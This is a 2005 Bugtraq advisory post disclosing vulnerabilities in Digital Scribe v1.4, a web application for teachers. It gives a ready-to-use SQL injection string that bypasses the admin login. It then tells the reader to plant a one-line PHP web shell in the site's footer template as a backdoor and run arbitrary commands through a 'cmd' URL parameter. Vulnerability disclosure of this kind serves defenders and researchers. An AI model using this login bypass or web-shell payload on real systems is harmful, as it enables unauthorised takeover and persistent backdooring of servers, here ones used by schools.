Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

retrogod_at_aliceposta.it
Date: 09/15/05

  • Next message: Martin Schulze: "[SECURITY] [DSA 813-1] New centericq packages fix several vulnerabilities"
    Date: 15 Sep 2005 12:51:23 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

    software:

    site: http://www.digital-scribe.org/

    description: "Teachers have full control through a web-based interface. Designed
    for easy installation and even easier use, the Digital Scribe has been used in
    thousands of schools. No teacher or IT Personnel needs to know any computer
    languages in order to install and use this intuitive system.

    1) Login Bypass / SQL Injection ************************************************

    login as admin typing:

    login: " or isnull(1/0) /*
    password: [whatever]

    2) remote code execution *******************************************************
    now you can edit template and leave a backdoor on target system:
    at the end of the footer try this:

    <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>

    then you can launch commands:

    http://[target]/[path_to_dscribe]/index.php?cmd=[some_command]

    rgod
    site: http://rgod.altervista.org
    email: retrogod at aliceposta it
    original advisory: http://rgod.altervista.org/dscribe14.html
    ********************************************************************************


  • Next message: Martin Schulze: "[SECURITY] [DSA 813-1] New centericq packages fix several vulnerabilities"